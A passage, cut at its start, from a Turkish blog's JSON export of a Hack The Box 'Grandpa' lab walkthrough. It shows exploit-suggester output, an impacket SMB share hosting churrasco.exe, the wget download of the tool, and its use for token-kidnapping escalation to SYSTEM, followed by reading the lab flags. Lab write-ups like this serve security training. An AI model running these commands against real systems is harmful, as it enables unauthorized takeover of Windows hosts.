Elevation of Privilege (3011780) - Critical\n[*]   http:\/\/www.exploit-db.com\/exploits\/35474\/ -- Windows Kerberos - Elevation of Privilege (MS14-068), PoC\n[M] MS14-062: Vulnerability in Message Queuing Service Could Allow Elevation of Privilege (2993254) - Important\n[*]   http:\/\/www.exploit-db.com\/exploits\/34112\/ -- Microsoft Windows XP SP3 MQAC.sys - Arbitrary Write Privilege Escalation, PoC\n[*]   http:\/\/www.exploit-db.com\/exploits\/34982\/ -- Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation\n[E] MS14-040: Vulnerability in Ancillary Function Driver (AFD) Could Allow Elevation of Privilege (2975684) - Important\n[*]   https:\/\/www.exploit-db.com\/exploits\/39525\/ -- Microsoft Windows 7 x64 - afd.sys Privilege Escalation (MS14-040), PoC\n[*]   https:\/\/www.exploit-db.com\/exploits\/39446\/ -- Microsoft Windows - afd.sys Dangling Pointer Privilege Escalation (MS14-040), PoC\n[E] MS14-026: Vulnerability in .NET Framework Could Allow Elevation of Privilege (2958732) - Important\n[M] MS14-009: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege (2916607) - Important\n[E] MS14-002: Vulnerability in Windows Kernel Could Allow Elevation of Privilege (2914368) - Important\n[E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important\n[M] MS11-080: Vulnerability in Ancillary Function Driver Could Allow Elevation of Privilege (2592799) - Important\n[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important\n[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important\n[M] MS10-015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165) - Important\n[M] MS09-020: Vulnerabilities in Internet Information Services (IIS) Could Allow Elevation of Privilege (970483) - Important\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/htb\/Windows\/Grandpa]\n\u2514\u2500# cat systeminfoResult | grep Privilege | grep kernel\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/htb\/Windows\/Grandpa]\n\u2514\u2500# cat systeminfoResult | grep Privilege | grep Kernel                                                                                                  1 \u2a2f\n[M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important\n[E] MS14-002: Vulnerability in Windows Kernel Could Allow Elevation of Privilege (2914368) - Important\n[E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important\n[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important\n[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important\n[M] MS10-015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165) - Important\n<\/code><\/pre>\n<p>Bunun \u00fczerine <strong>Token Kidnapping Local Privilege Escalation<\/strong> exe'isen gittim. (<a href=\"https:\/\/github.com\/kudayDOTsite\/Churrasco\">https:\/\/github.com\/kudayDOTsite\/Churrasco<\/a>)<br \/>\n\u0130lk olarak SMB'yi ba\u015flatt\u0131m.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/htb\/Windows\/Grandpa\/exploits]\n\u2514\u2500# \/usr\/bin\/impacket-smbserver KUDAY .<\/code><\/pre>\n<p>Daha sonra exe'yi indirdim.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/htb\/Windows\/Grandpa\/exploits]\n\u2514\u2500# wget https:\/\/github.com\/Re4son\/Churrasco\/raw\/master\/churrasco.exe                             \n\n--2021-08-01 09:56:39--  https:\/\/github.com\/Re4son\/Churrasco\/raw\/master\/churrasco.exe\nResolving github.com (github.com)... 140.82.121.4\nConnecting to github.com (github.com)|140.82.121.4|:443... connected.\nHTTP request sent, awaiting response... 302 Found\nLocation: https:\/\/raw.githubusercontent.com\/Re4son\/Churrasco\/master\/churrasco.exe [following]\n--2021-08-01 09:56:39--  https:\/\/raw.githubusercontent.com\/Re4son\/Churrasco\/master\/churrasco.exe\nResolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.108.133, 185.199.109.133, 185.199.110.133, ...\nConnecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 31232 (30K) [application\/octet-stream]\nSaving to: \u2018churrasco.exe\u2019\n\nchurrasco.exe                           100%[============================================================================&gt;]  30.50K  --.-KB\/s    in 0.009s  \n\n2021-08-01 09:56:40 (3.36 MB\/s) - \u2018churrasco.exe\u2019 saved [31232\/31232]<\/code><\/pre>\n<p>Windows'a kopyalad\u0131m ve yetki y\u00fcksellttim.<\/p>\n<pre><code class=\"language-sh\">\nC:\\WINDOWS\\Temp&gt;whoami\nwhoami\nnt authority\\network service\n\nC:\\WINDOWS\\Temp&gt;copy \\\\10.10.14.9\\KUDAY\\churrasco.exe .\ncopy \\\\10.10.14.9\\KUDAY\\churrasco.exe .\n        1 file(s) copied.\n\nC:\\WINDOWS\\Temp&gt;churrasco.exe\nchurrasco.exe\n\/churrasco\/--&gt;Usage: Churrasco.exe [-d] &quot;command to run&quot;\nC:\\WINDOWS\\TEMP\n\nC:\\WINDOWS\\Temp&gt;churrasco.exe -d &quot;cmd.exe&quot;\nchurrasco.exe -d &quot;cmd.exe&quot;\n\/churrasco\/--&gt;Current User: NETWORK SERVICE \n\/churrasco\/--&gt;Getting Rpcss PID ...\n\/churrasco\/--&gt;Found Rpcss PID: 684 \n\/churrasco\/--&gt;Searching for Rpcss threads ...\n\/churrasco\/--&gt;Found Thread: 688 \n\/churrasco\/--&gt;Thread not impersonating, looking for another thread...\n\/churrasco\/--&gt;Found Thread: 692 \n\/churrasco\/--&gt;Thread not impersonating, looking for another thread...\n\/churrasco\/--&gt;Found Thread: 700 \n\/churrasco\/--&gt;Thread impersonating, got NETWORK SERVICE Token: 0x730\n\/churrasco\/--&gt;Getting SYSTEM token from Rpcss Service...\n\/churrasco\/--&gt;Found LOCAL SERVICE Token\n\/churrasco\/--&gt;Found NETWORK SERVICE Token\n\/churrasco\/--&gt;Found LOCAL SERVICE Token\n\/churrasco\/--&gt;Found SYSTEM token 0x728\n\/churrasco\/--&gt;Running command with SYSTEM Token...\n\/churrasco\/--&gt;Done, command should have ran as SYSTEM!\nMicrosoft Windows [Version 5.2.3790]\n(C) Copyright 1985-2003 Microsoft Corp.\n\nC:\\WINDOWS\\TEMP&gt;whoami\nwhoami\n\nC:\\WINDOWS\\Temp&gt;whoami\nwhoami\nnt authority\\system\n\nC:\\WINDOWS\\TEMP&gt;cd C:\\\ncd C:\\\n\nC:\\&gt;dir\ndir\n Volume in drive C has no label.\n Volume Serial Number is 246C-D7FE\n\n Directory of C:\\\n\n04\/12\/2017  05:27 PM    &lt;DIR&gt;          ADFS\n04\/12\/2017  05:04 PM                 0 AUTOEXEC.BAT\n04\/12\/2017  05:04 PM                 0 CONFIG.SYS\n04\/12\/2017  05:32 PM    &lt;DIR&gt;          Documents and Settings\n04\/12\/2017  05:17 PM    &lt;DIR&gt;          FPSE_search\n04\/12\/2017  05:17 PM    &lt;DIR&gt;          Inetpub\n12\/24\/2017  08:18 PM    &lt;DIR&gt;          Program Files\n12\/24\/2017  08:27 PM    &lt;DIR&gt;          WINDOWS\n04\/12\/2017  05:05 PM    &lt;DIR&gt;          wmpub\n               2 File(s)              0 bytes\n               7 Dir(s)  18,087,477,248 bytes free\n\nC:\\&gt;cd &quot;Documents and Settings&quot;\ncd &quot;Documents and Settings&quot;\n\nC:\\Documents and Settings&gt;dir\ndir\n Volume in drive C has no label.\n Volume Serial Number is 246C-D7FE\n\n Directory of C:\\Documents and Settings\n\n04\/12\/2017  05:32 PM    &lt;DIR&gt;          .\n04\/12\/2017  05:32 PM    &lt;DIR&gt;          ..\n04\/12\/2017  05:12 PM    &lt;DIR&gt;          Administrator\n04\/12\/2017  05:03 PM    &lt;DIR&gt;          All Users\n04\/12\/2017  05:32 PM    &lt;DIR&gt;          Harry\n               0 File(s)              0 bytes\n               5 Dir(s)  18,087,477,248 bytes free\n\nC:\\Documents and Settings&gt;cd Harry\ncd Harry\n\nC:\\Documents and Settings\\Harry&gt;cd Desktop\ncd Desktop\n\nC:\\Documents and Settings\\Harry\\Desktop&gt;dir\ndir\n Volume in drive C has no label.\n Volume Serial Number is 246C-D7FE\n\n Directory of C:\\Documents and Settings\\Harry\\Desktop\n\n04\/12\/2017  05:32 PM    &lt;DIR&gt;          .\n04\/12\/2017  05:32 PM    &lt;DIR&gt;          ..\n04\/12\/2017  05:32 PM                32 user.txt\n               1 File(s)             32 bytes\n               2 Dir(s)  18,087,477,248 bytes free\n\nC:\\Documents and Settings\\Harry\\Desktop&gt;type user.txt\ntype user.txt\nbdff5ec67c3cff017f2bedc146a5d869\nC:\\Documents and Settings\\Harry\\Desktop&gt;cd ..\ncd ..\n\nC:\\Documents and Settings\\Harry&gt;cd ..\ncd ..\n\nC:\\Documents and Settings&gt;cd Administrator\\Desktop\ncd Administrator\\Desktop\n\nC:\\Documents and Settings\\Administrator\\Desktop&gt;dir\ndir\n Volume in drive C has no label.\n Volume Serial Number is 246C-D7FE\n\n Directory of C:\\Documents and Settings\\Administrator\\Desktop\n\n04\/12\/2017  05:28 PM    &lt;DIR&gt;          .\n04\/12\/2017  05:28 PM    &lt;DIR&gt;          ..\n04\/12\/2017  05:29 PM                32 root.txt\n               1 File(s)             32 bytes\n               2 Dir(s)  18,087,473,152 bytes free\n\nC:\\Documents and Settings\\Administrator\\Desktop&gt;type root.txt\ntype root.txt\n9359e905a2c35f861f6a57cecf28bb7b\nC:\\Documents and Settings\\Administrator\\Desktop&gt;\n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Makine Ad\u0131 Seviye OS Logo Grandpa &#8211; HTB Kolay Windows Walkthrough nmapAutomator.sh ile ba\u015flayal\u0131m. Hedef makinede sadece 80 portunun a\u00e7\u0131k oldu\u011funu tespit ettim ve \u00fczerinden&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/08\/01\/grandpa\/\">Devam\u0131n\u0131 oku<span class=\"screen-reader-text\">Grandpa<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[498,468],"tags":[589,588],"class_list":["post-1447","post","type-post","status-publish","format-standard","hentry","category-walkthrough","category-windows","tag-iis6","tag-token-kidnapping-local-privilege-escalation","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1447","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1447"}],"version-history":[{"count":1,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1447\/revisions"}],"predecessor-version":[{"id":1448,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1447\/revisions\/1448"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1447"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1447"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1447"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}